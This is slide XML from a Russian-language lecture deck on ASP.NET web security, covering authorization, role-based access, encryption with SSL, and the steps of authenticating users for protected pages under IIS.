            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Задать каждому </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложению различные права:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Использовать существующие права пользователя </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800"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561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Авторизация (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1125538"/>
            <a:ext cx="8229600" cy="5327650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Это процесс определения прав и ограничений для аутентифицированного пользователя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>В приложении может использоваться авторизация на основе ролей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" i="1" smtClean="0"/>
              <a:t>role-based authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>). В этом случае авторизация основывается на принадлежности пользователей ролям или группам, а не на основе данных пользователя. Такой вид авторизации прост для реализации</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложении используются разные типы авторизации на различных уровнях. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Например, на самом верхнем уровне код  приложения может проверять идентичность пользователя и решать, продолжать ли выполнять некоторую операцию.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>На более низком уровне, можно сконфигурировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>таким образом, чтобы отклонять доступ к некоторым </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>страницам или директориям для некоторых пользователей или ролей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>На еще более низком уровне, при выполнении в приложении различных задач (например, соединений с БД, открытие фалов, запись в журнал событий) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>OC Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>проверяет разрешения учетной записи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>которая выполняет код. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>В большинстве случаев </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>код выполняется под одной учетной записью (в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IIS 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>это учетная запись </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASPNET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="18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850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Конфиденциальность и целостность</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" smtClean="0"/>
              <a:t>co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>nfidentiality и Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268413"/>
            <a:ext cx="8229600" cy="5400675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Конфиденциальность означает, что данные не могут просматриваться не уполномоченными для этого пользователями, во время передачи по сети и хранения в базе данных. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Целостность это гарантирование того, что никто не может изменить данные, пока они передаются по сети или хранятся в БД.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Они основываются на шифровании данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Шифрование это процесс кодирования данных таким образом, чтобы они не могли быть прочитаны другими пользователями. В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>шифрование полностью отделено от аутентификации, авторизации и имперсонификации. Можно использовать их комбинацию.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Шифрование используется в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>приложении по двум причинам:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Для защиты передачи данных по сети. Для этого используется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>SSL. SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>также реализует цифровые подписи для гарантирования целостности. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>реализуется не </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>а </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IIS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Для защиты постоянного хранения данных в БД или файлах.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ru-RU" sz="4000" smtClean="0"/>
              <a:t>Порядок аутентификации пользователей</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4852988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Когда пользователи первый раз заходят на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>сайт, то они являются анонимными. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложение не знает, кто они. Если приложение не аутентифицирует их, они так и останутся анонимными. По умолчанию анонимные пользователи могут получить доступ к любой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>странице.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Но когда пользователь запрашивает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>страницу, к которой не разрешен анонимный доступ, то происходит несколько действий:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Запрос отправляется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>серверу. Так как личность (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>пользователя к этому моменту не известна, то пользователя просят подключиться (например, используя собственную </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>страницу). Конкретные детали процесса подключения зависят от типа используемой аутентификации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Пользователь указывает свои данные, которые затем проверяются или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложением или автоматически </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>IIS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>в случае </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>аутентификации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если данные пользователя подтверждаются, ему предоставляется доступ к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>странице. Если его данные не подтверждаются, то пользователю предлагается подключиться еще раз.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="18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sz="3200" smtClean="0"/>
              <a:t>Запрос </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>страницы, требующей аутентификации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28675" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="20476" t="34245" r="29329" b="25391"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="1700213"/>
            <a:ext cx="7451725" cy="449421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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Запрос защищенной </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>страницы</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Когда пользователь запрашивает защищенную web страницу, доступ к которой разрешен только конкретным пользователям, или пользователям конкретной роли, то процесс проверки будет аналогично, но выполняется дополнительный шаг:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Запрос отправляется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>серверу. Так как личность (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>пользователя к этому моменту не известна, то пользователя просят подключиться (например, используя собственную </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>страницу или основанный на браузере диалоговое окно подключения - login dialog box). Конкретные детали процесса подключения зависят от типа используемой аутентификации. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Пользователь указывает свои данные, которые затем проверяются или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>приложением. Это этап аутентификации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Для аутентифицированных пользователей их  права (credentials) или роли (roles) сравниваются со списком пользователей или ролей, коорым разрешен доступ к данной странице. Если пользователь есть в этом списке, то ему предоставляется доступ к ресурсу; в противном случае в доступе отказывается.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Пользователи, которым было отказано в доступе предлагается или подключиться заново (log in again) или они перенаправляются на страницу с сообщением о том, что «В доступе отказано»  (“access denied” message).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="16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sz="3200" smtClean="0"/>
              <a:t>Запрос </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>страницы, требующей авторизации</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30723" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="15300" t="34245" r="15300" b="26367"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="2276475"/>
            <a:ext cx="8280400" cy="35242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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Содержимое 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Сервисы предоставляются с помощью:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Сервисных ЭУ, которые выполняют некоторые функции.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Прикладного программного интерфейса – специальных классов, позволяющих выполнять требуемые функции.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Настройки файла конфигурации приложения (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Безопасность </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Internet Information Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Прежде чем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
